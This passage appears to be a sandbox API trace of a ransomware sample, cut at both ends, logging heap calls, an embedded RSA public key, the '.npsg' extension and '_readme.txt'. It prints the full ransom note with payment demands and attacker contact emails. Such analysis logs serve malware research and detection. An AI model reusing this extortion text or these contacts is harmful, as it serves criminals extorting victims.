KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----", lpUsedDefaultChar=0x0) returned 470 [0226.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e0) returned 0x695e90 [0226.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68b698 | out: hHeap=0x620000) returned 1 [0226.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f15c8 | out: hHeap=0x620000) returned 1 [0226.159] lstrcpyA (in: lpString1=0x33e1008, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----" [0226.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x695e90 | out: hHeap=0x620000) returned 1 [0226.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673cf0 [0226.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x33f7d78 [0226.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33eb5e8 [0226.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33eb850 [0226.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33ebab8 [0226.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33ebd20 [0226.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33ebf88 [0226.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33ec1f0 [0226.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x340eee0 [0226.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x340f148 [0226.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x340f3b0 [0226.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x340f618 [0226.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x816) returned 0x692260 [0226.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df70, cbMultiByte=-1, lpWideCharStr=0x692260, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x692a80 [0226.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x692260 | out: hHeap=0x620000) returned 1 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x33f80a8 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x340f880 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x340fae8 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x340fd50 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x340ffb8 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3410220 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3410488 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x34106f0 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3410958 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3410bc0 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3410e28 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x67c738 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x130) returned 0x33b4138 [0226.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c738 | out: hHeap=0x620000) returned 1 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1d0) returned 0x67eb28 [0226.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b4138 | out: hHeap=0x620000) returned 1 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2b7) returned 0x68b698 [0226.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67eb28 | out: hHeap=0x620000) returned 1 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x412) returned 0x695e90 [0226.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68b698 | out: hHeap=0x620000) returned 1 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x61a) returned 0x6932a8 [0226.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x695e90 | out: hHeap=0x620000) returned 1 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x68b698 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x105e) returned 0x340bff0 [0226.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68b698, cbMultiByte=-1, lpWideCharStr=0x340bff0, cchWideChar=2095 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned 1072 [0226.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1060) returned 0x33da058 [0226.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340bff0 | out: hHeap=0x620000) returned 1 [0226.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68b698 | out: hHeap=0x620000) returned 1 [0226.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x33f7f28 [0226.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3411090 [0226.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x34112f8 [0226.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3411560 [0226.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x34117c8 [0226.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3411a30 [0226.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3411c98 [0226.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3411f00 [0226.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3412168 [0226.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x34123d0 [0226.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3412638 [0226.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80a) returned 0x692260 [0226.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df70, cbMultiByte=-1, lpWideCharStr=0x692260, cchWideChar=1029 | out: lpWideCharStr=".npsg") returned 6 [0226.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x33db0c0 [0226.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x692260 | out: hHeap=0x620000) returned 1 [0226.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fc848 [0226.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x643000 [0226.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x65a3a0 [0226.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c14f8 [0226.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643000 | out: hHeap=0x620000) returned 1 [0226.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673dc0 [0226.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x48) returned 0x33f71e8 [0226.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c14f8 | out: hHeap=0x620000) returned 1 [0226.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d75a8 [0226.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673d58 [0226.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f71e8 | out: hHeap=0x620000) returned 1 [0226.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0226.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e398 [0226.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673d58 | out: hHeap=0x620000) returned 1 [0226.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b18 [0226.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7710 [0226.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd8) returned 0x708a50 [0226.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e398 | out: hHeap=0x620000) returned 1 [0226.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fc870 [0226.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4b70 [0226.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673d58 [0226.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x138) returned 0x6affc0 [0226.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708a50 | out: hHeap=0x620000) returned 1 [0226.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7680 [0226.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4bc8 [0226.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4c20 [0226.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d76c8 [0226.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c8) returned 0x67eb28 [0226.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0226.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc848 | out: hHeap=0x620000) returned 1 [0226.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x65a3a0 | out: hHeap=0x620000) returned 1 [0226.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673dc0 | out: hHeap=0x620000) returned 1 [0226.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d75a8 | out: hHeap=0x620000) returned 1 [0226.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0226.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b18 | out: hHeap=0x620000) returned 1 [0226.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7710 | out: hHeap=0x620000) returned 1 [0226.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc870 | out: hHeap=0x620000) returned 1 [0226.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b70 | out: hHeap=0x620000) returned 1 [0226.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673d58 | out: hHeap=0x620000) returned 1 [0226.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7680 | out: hHeap=0x620000) returned 1 [0226.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4bc8 | out: hHeap=0x620000) returned 1 [0226.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4c20 | out: hHeap=0x620000) returned 1 [0226.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d76c8 | out: hHeap=0x620000) returned 1 [0226.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67eb28 | out: hHeap=0x620000) returned 1 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x33f8108 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x34128a0 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3412b08 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3412ee0 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3413148 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x34133b0 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3413618 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3413880 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3413ae8 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3413d50 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3413fb8 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x67c738 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x130) returned 0x33b4138 [0226.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c738 | out: hHeap=0x620000) returned 1 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1d0) returned 0x67eb28 [0226.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b4138 | out: hHeap=0x620000) returned 1 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2b7) returned 0x68b698 [0226.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67eb28 | out: hHeap=0x620000) returned 1 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x412) returned 0x695e90 [0226.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68b698 | out: hHeap=0x620000) returned 1 [0226.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x61a) returned 0x692260 [0226.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x695e90 | out: hHeap=0x620000) returned 1 [0226.181] GetUserNameW (in: lpBuffer=0x18e170, pcbBuffer=0x18dfe4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18dfe4) returned 1 [0226.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x590) returned 0x68b698 [0226.182] GetLastError () returned 0x0 [0226.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x643000 [0226.183] GetLastError () returned 0x0 [0226.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c14f8 [0226.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643000 | out: hHeap=0x620000) returned 1 [0226.183] GetLastError () returned 0x0 [0226.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x48) returned 0x33f71e8 [0226.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c14f8 | out: hHeap=0x620000) returned 1 [0226.183] GetLastError () returned 0x0 [0226.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673d58 [0226.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f71e8 | out: hHeap=0x620000) returned 1 [0226.183] GetLastError () returned 0x0 [0226.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e398 [0226.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673d58 | out: hHeap=0x620000) returned 1 [0226.183] GetLastError () returned 0x0 [0226.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd8) returned 0x708a50 [0226.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e398 | out: hHeap=0x620000) returned 1 [0226.183] GetLastError () returned 0x0 [0226.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x138) returned 0x6affc0 [0226.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708a50 | out: hHeap=0x620000) returned 1 [0226.183] GetLastError () returned 0x0 [0226.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fc870 [0226.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c8) returned 0x692888 [0226.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0226.183] GetLastError () returned 0x0 [0226.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fc848 [0226.183] GetLastError () returned 0x0 [0226.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fc668 [0226.183] GetLastError () returned 0x0 [0226.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fc640 [0226.183] GetLastError () returned 0x0 [0226.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fc690 [0226.184] GetLastError () returned 0x0 [0226.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2a0) returned 0x695e90 [0226.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x692888 | out: hHeap=0x620000) returned 1 [0226.184] GetLastError () returned 0x0 [0226.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fc6b8 [0226.184] GetLastError () returned 0x0 [0226.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c14f8 [0226.184] GetLastError () returned 0x0 [0226.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c16f0 [0226.184] GetLastError () returned 0x0 [0226.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fc7f8 [0226.184] GetLastError () returned 0x0 [0226.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fc820 [0226.184] GetLastError () returned 0x0 [0226.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fc6e0 [0226.184] GetLastError () returned 0x0 [0226.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fc7a8 [0226.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f0) returned 0x33db8d8 [0226.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x695e90 | out: hHeap=0x620000) returned 1 [0226.184] GetLastError () returned 0x0 [0226.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fc780 [0226.184] GetLastError () returned 0x0 [0226.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fc7d0 [0226.184] GetLastError () returned 0x0 [0226.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fc9b0 [0226.184] GetLastError () returned 0x0 [0226.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1760 [0226.184] GetLastError () returned 0x0 [0226.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c13a8 [0226.184] GetLastError () returned 0x0 [0226.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fc9d8 [0226.185] GetLastError () returned 0x0 [0226.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fca00 [0226.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e8) returned 0x3400dc8 [0226.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33db8d8 | out: hHeap=0x620000) returned 1 [0226.185] GetLastError () returned 0x0 [0226.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fca28 [0226.185] GetLastError () returned 0x0 [0226.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fca50 [0226.185] GetLastError () returned 0x0 [0226.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fca78 [0226.185] GetLastError () returned 0x0 [0226.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcaa0 [0226.185] GetLastError () returned 0x0 [0226.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcac8 [0226.185] GetLastError () returned 0x0 [0226.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcaf0 [0226.185] GetLastError () returned 0x0 [0226.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1488 [0226.185] GetLastError () returned 0x0 [0226.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1798 [0226.185] GetLastError () returned 0x0 [0226.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcb18 [0226.185] GetLastError () returned 0x0 [0226.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcb40 [0226.185] GetLastError () returned 0x0 [0226.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcb68 [0226.185] GetLastError () returned 0x0 [0226.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcb90 [0226.185] GetLastError () returned 0x0 [0226.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcbb8 [0226.186] GetLastError () returned 0x0 [0226.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcbe0 [0226.186] GetLastError () returned 0x0 [0226.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8d0) returned 0x33db8d8 [0226.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400dc8 | out: hHeap=0x620000) returned 1 [0226.186] GetLastError () returned 0x0 [0226.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcc08 [0226.186] GetLastError () returned 0x0 [0226.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcc30 [0226.186] GetLastError () returned 0x0 [0226.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c17d0 [0226.186] GetLastError () returned 0x0 [0226.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1808 [0226.186] GetLastError () returned 0x0 [0226.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcc58 [0226.186] GetLastError () returned 0x0 [0226.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcc80 [0226.186] GetLastError () returned 0x0 [0226.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcca8 [0226.186] GetLastError () returned 0x0 [0226.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fccd0 [0226.186] GetLastError () returned 0x0 [0226.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fccf8 [0226.186] GetLastError () returned 0x0 [0226.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81e) returned 0x33dc1b0 [0226.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df70, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1039 | out: 